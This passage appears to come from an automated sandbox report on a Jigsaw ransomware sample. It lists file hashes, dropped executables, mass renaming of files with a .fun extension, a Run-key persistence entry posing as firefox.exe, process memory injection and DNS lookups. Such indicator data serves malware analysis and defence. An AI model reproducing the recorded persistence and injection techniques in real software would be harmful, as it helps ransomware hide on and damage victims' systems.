| SHA512 | 157c73e663f9fbf4ba93107f743c66828020c94f8028e61f3315db3f1e490b2929aabd92bbc496182da59344f320227b4052df7445762f37e4136c5cf62e61fb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e367fb2366f0022e46a11f91b0183c48 |
| SHA1 | 77e45c3d4fabb032cf8f2bc1bf09a69a7e3ae193 |
| SHA256 | e5e681ab6ac93f50ec8c0789888e37ea474c6dd9a6e475fa95d6649981f06618 |
| SHA512 | 735305dc6a26c33bf1e0598af370c4c004b59f417ac64481c38ab49fdd08e6dc98ac40b0e2a694644124366e3ca6215aa7493372a499b248be154c9a7e651e1d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 00e8a2b076e55ceba8027320b9b94ea6 |
| SHA1 | 8b72c705abb4e5443dc4c88cf52443b0c3a7fa3d |
| SHA256 | fa010ca070681ad0318beb0cd7d218232df59bcfec0cdac8fa11311ab2da0817 |
| SHA512 | ddebb9a14d70b20fc8fa40c0974b13084bbed784fbe8254347809be64a1e21f5485f1eb336db8e494260131f263760044987859df2bcf74a0a891e8e0dfcb5a9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0f764dab30698f8afa94c52c93fc5a5e |
| SHA1 | 6480fe0ef7830f3ac67391a3bb1b17fd0ce12eef |
| SHA256 | cf9bb3e012d54e45858239c657482f7b394ab4c56c7122013b93d50e6620168e |
| SHA512 | e1e87e9c346c250d3195cefea932f6153141a6d6326157283b8ad45a508ed3e9432acfc8e6f740b623fddc9732e80a370c6ca0b0414aab99a31cfced95f5ed48 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3ca8982e75c334d14e0fca74ff690080 |
| SHA1 | 9fdae0e82daaf0dcbbf0861df08eff74301f3ba7 |
| SHA256 | 900b2a3dac826b4a97760db6c859230d43fe849f744bec45ce877db436b3a50a |
| SHA512 | b2adb041d208934e7f600d500754031310c3403a8e93262f015789350d4c69a6b01d4e302d33f3d0e013b3459cd37f9c44efef92140e8e8b5ead44f7eebe8fa5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0de72c1290c5b9d0fe1b32fe811c5705 |
| SHA1 | de277f5426b1d5940d72670c1e8a89be31bc11b4 |
| SHA256 | b2aa4efa1ea6eb71c894bdb118ee2f05b8f5823985167e5b42050cd3c6bc02de |
| SHA512 | 07c32d3d7faa5e00edfda2bcf46adecbffa23b8b14f4d662e3c0f4d77e3dcb85569d030204c01a8988e09f5f29b57fad423044af7d1d9d7d0327d86916a50ec5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2fc6aaea1b993ea49e3461fa9fca6ff9 |
| SHA1 | dcf09801d0b0dad83ec06486ce47c2e3b9409f65 |
| SHA256 | 2267a0227a1566f00af01a9dae8ded66f5059de3ec0917c8e6846222778e201d |
| SHA512 | 495edaa81b5223c045f0fdee8d02fdcc46c978a6b8717a35c553d3f6d3b61c469fa611745e0d945b92e67a728fc3b900f24034e8fc0e863056af83b41ddb0388 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ab2605a431b118a8f43904653d3c921e |
| SHA1 | 010c6dfaa8adc1b8f2711ce379063d95139d13e6 |
| SHA256 | ff8737a457b2a0ba4040a71b0b15b345c2fbc5e92fb5402ac27a88e0dd3e40ae |
| SHA512 | 968af762b462b09c143b404ecd2f6c74a28e31a63da586a024f836d2793fd0e699181b9aa180f6bc3b4c0f09fd2641cc68cada6c161584a5d40a90ac012f3e64 |
C:\Users\Admin\AppData\Local\Temp\~DF5F72849F0C42E09F.TMP
| MD5 | 93dc455d219cd8cfad0590ac4c9c6119 |
| SHA1 | 8b201e2effe811c03f4c8e23942725de12a001cf |
| SHA256 | 1499fe469a0ab3edd3ad0f65060ca41e567ad12943f1957ce09af00b87cf8740 |
| SHA512 | 01f9bb499f2df83a80833ac6305fcaebe6205be896b8f380d514fb28c342ff57f6510e80922ae9d37216a259d70b71ffb54f5e9b3371c62805cf9b313cf10911 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:25
Platform
win10v2004-20241007-en
Max time kernel
63s
Max time network
64s
Command Line
Signatures
Jigsaw Ransomware
Jigsaw family
Renames multiple (3763) files with added filename extension
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\jigsaw.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" | C:\Users\Admin\AppData\Local\Temp\jigsaw.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-72_altform-lightunplated.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\SkypeAppList.scale-200_contrast-black.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\LinkedInboxLargeTile.scale-400.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\StoreAppList.scale-100.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Unlock.png.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-60.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\SearchEmail.png.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\ui-strings.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\rsod\word.x-none.msi.16.x-none.boot.tree.dat | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSplashLogo.scale-300.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipschs.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedAppList.scale-200_contrast-white.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\AppPackageLargeTile.scale-125_contrast-white.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\ui-strings.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\ui-strings.js.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\delete.svg.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_pt_135x40.svg | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\people\rachelVaughan.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\CardUIBkg.scale-200.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\affDescription.txt.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\nl.txt | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\Weather_TileMediumSquare.scale-200.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\file_icons.png.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\ui-strings.js.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\nub.png.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\ui-strings.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\ca.txt | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-24_altform-unplated.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\OrientationSensorCalibrationFigure.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_share_18.svg | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubSplashWideTile.scale-125_contrast-black.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\onboarding\notifications_emptystate_v3.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\core_icons.png.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\Timer3Sec.targetsize-20.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.scale-125.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-black\MixedRealityPortalAppList.targetsize-32_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.scale-100.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreSmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME.txt | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Google.scale-125.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red Orange.xml | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\ui-strings.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\Movie-TVStoreLogo.scale-125_contrast-white.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon.png.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\ui-strings.js.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\nb-no\ui-strings.js.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.scale-150.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\fre\StartMenu_Win10.mp4 | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\selector.js.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\OutlookMailLargeTile.scale-200.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.DesktopAppInstaller_1.0.30251.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppPackageWideTile.scale-100.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_shared_multi_filetype.svg.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\accessibility_poster.jpg.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\tr-tr\ui-strings.js.fun | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\OutlookMailSmallTile.scale-400.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\AppIcon.targetsize-96_altform-unplated_contrast-black.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\editpdf-tool-view.js | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionWideTile.scale-200.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeMedTile.scale-100.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-200_contrast-white.png | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 744 wrote to memory of 4828 | N/A | C:\Users\Admin\AppData\Local\Temp\jigsaw.exe | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe |
| PID 744 wrote to memory of 4828 | N/A | C:\Users\Admin\AppData\Local\Temp\jigsaw.exe | C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\jigsaw.exe
"C:\Users\Admin\AppData\Local\Temp\jigsaw.exe"
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\AppData\Local\Temp\jigsaw.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
memory/744-0-0x00007FFEC70A5000-0x00007FFEC70A6000-memory.dmp
memory/744-1-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp
memory/744-2-0x000000001B3B0000-0x000000001B3E8000-memory.dmp
memory/744-3-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp
memory/744-4-0x000000001B990000-0x000000001BE5E000-memory.dmp
memory/744-5-0x000000001BF00000-0x000000001BF9C000-memory.dmp
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe
| MD5 | 2773e3dc59472296cb0024ba7715a64e |
| SHA1 | 27d99fbca067f478bb91cdbcb92f13a828b00859 |
| SHA256 | 3ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7 |
| SHA512 | 6ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262 |
memory/744-19-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp
memory/4828-20-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp
memory/4828-21-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp
memory/4828-22-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp
memory/4828-23-0x00000000016C0000-0x00000000016C8000-memory.dmp
memory/4828-24-0x00007FFEC6DF0000-0x00007FFEC7791000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\{562D540A-FF15-4D86-B4BE-81579BF660FF} - OProcSessId.dat.fun
| MD5 | 8ebcc5ca5ac09a09376801ecdd6f3792 |
| SHA1 | 81187142b138e0245d5d0bc511f7c46c30df3e14 |
| SHA256 | 619e246fc0ac11320ff9e322a979948d949494b0c18217f4d794e1b398818880 |
| SHA512 | cec50bfc6ad2f57f16da99459f40f2d424c6d5691685fa1053284f46c8c8c8a975d7bcb1f3521c4f3fbdc310cf4714e29404aa23be6021e2e267c97b090dc650 |
C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\invalid32x32.gif.fun
| MD5 | 580ee0344b7da2786da6a433a1e84893 |
| SHA1 | 60f8c4dd5457e9834f5402cb326b1a2d3ca0ba7e |
| SHA256 | 98b6c2ddfefc628d03ceaef9d69688674a6bc32eb707f9ed86bc8c75675c4513 |
| SHA512 | 356d2cdea3321e894b5b46ad1ea24c0e3c8be8e3c454b5bd300b7340cbb454e71fc89ca09ea0785b373b483e67c2f6f6bb408e489b0de4ff82d5ed69a75613ba |
C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt.fun
| MD5 | 829165ca0fd145de3c2c8051b321734f |
| SHA1 | f5cc3af85ab27c3ea2c2f7cbb8295b28a76a459e |
| SHA256 | a193ee2673e0ba5ebc5ea6e65665b8a28bd7611f06d2b0174ec2076e22d94356 |
| SHA512 | 7d380cda12b342a770def9d4e9c078c97874f3a30cd9f531355e3744a8fef2308f79878ffeb12ce26953325cb6a17bc7e54237dfdc2ee72b140ec295676adbcb |
C:\Users\Admin\AppData\Local\Packages\Microsoft.AccountsControl_cw5n1h2txyewy\Settings\settings.dat.fun
| MD5 | f22599af9343cac74a6c5412104d748c |
| SHA1 | e2ac4c57fa38f9d99f3d38c2f6582b4334331df5 |
| SHA256 | 36537e56d60910ab6aa548e64ca4adafdcabde9d60739013993e12ba061dfd65 |
| SHA512 | 5c8afc025e1d8342d93b7842dc7ef22eca61085857a80a08ba9b3f156ee3b814606bb32bc244bd525a7913e7915bdf3a86771d39577f4a1176ade04dc381c6d4 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727662745216155.txt.fun
| MD5 | 84b14c0b386167ead365a9b9e59ea3fb |
| SHA1 | e1208de8f990375457a717e56ab029854d2f884e |
| SHA256 | 47831e61dc8d3592aea999494aec6832c8916d5a61e66061fee4a5f2e085adca |
| SHA512 | b82c5f58fa61de7910831d7758833c8ec800e9ce14e684723d8daa88d1a601dfa6a35296ad150489d4a6cae070f1ec702d45e96041c5cbdb751e7e8cf0218d85 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727664176773847.txt.fun
| MD5 | 7e2b71326c97cbb411d0593dfa481681 |
| SHA1 | 7ef3573dfbae2f60c0ae4403371a8b491be14165 |
| SHA256 | 8664ead4f29996331eab64768cd21ed56f37d0a1669d78dc8c172f7a6d0770cd |
| SHA512 | 63c628c4fea4d572348d083f0bfda8724d3c23c5c9abcf292c76c7e7beea8672a04b5c9e1b1c23370e1ac652c580697a2e0fbd796799df805c7136dd2b7af443 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133727670801391576.txt.fun
| MD5 | b83af47bb28d058a28d51212854a18b3 |
| SHA1 | 3c69b6d1f8d0bbf3e7e090f78f41595ad766de4e |
| SHA256 | 41f5e91acda82bbf5ae94ab86b02aaccf6b39d3af9a0c9d32527fdadb39caf72 |
| SHA512 | b17f1317b1c1c0207f4eca9868e8ae99ceb57317a56df7d198ffc140f83ae64615e1462e973be0fd8070b2e9bb3b78d7ac76739480f3c236b53fd60e93463393 |
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133771083036641091.txt.fun
| MD5 | e815da01303d7539ca0f8aebb61063f5 |
| SHA1 | e5b18401553df9d34ae349fee78f0ca747a0cab3 |
| SHA256 | 58cafc7981122f4e37ae6b3792c38d296d8fe36761338734910faec23c9554a8 |
| SHA512 | 6172aefd5215aa40c0f74d90b3e27a95763fb97a7ddde25c2b9d0c777536d9cc1a2da4d1b9cf56bd93ceea2223be5b99311af7a26ef5c3f206dab9f03e0ab90d |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.fun
| MD5 | 75a585c1b60bd6c75d496d3b042738d5 |
| SHA1 | 02c310d7bf79b32a43acd367d031b6a88c7e95ed |
| SHA256 | 5ebbfc6df60e21044486a5df3cb47ccdcd7a4d5f197804555715ffd9bf6c5834 |
| SHA512 | 663a302e651b9167f4c4e6ae30028307b4d8da0dda3a0e5fd414104951d50419862fc9396c5b39fe5c4b696efd3efbf0b575688983b1d341f3ef38becf500505 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.fun
| MD5 | 880833ad1399589728c877f0ebf9dce0 |
| SHA1 | 0a98c8a78b48c4b1b4165a2c6b612084d9d26dce |
| SHA256 | 7a27d891097df183fbf0031e3894bdac0ce77aef15d666ddd9f6a04e9836fb27 |
| SHA512 | 0ddf247892a72a390437390d535debf6e41d12e51b31eb4f0353b710ec380c5fbc531a48e76935088063a41aca843287d3def9c1cd46be05b8dcb69f5017a464 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.fun
| MD5 | 409a8070b50ad164eda5691adf5a2345 |
| SHA1 | e84e10471f3775d5d706a3b7e361100c9fbfaf74 |
| SHA256 | a91790b778026db625c9dedfe1c6d94b884818b33d7977e86b2f9c2f3c500796 |
| SHA512 | 767a75edd37d29b3433040ce21cda849cd11ba549f27581f7edc6416c433ba7047c56908d40956422393ab0f35ede61617d4bd2aad0bde3d1ebd276584c858c7 |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.fun
| MD5 | e092d14d26938d98728ce4698ee49bc3 |
| SHA1 | 9f8ee037664b4871ec02ed6bba11a5317b9e784a |
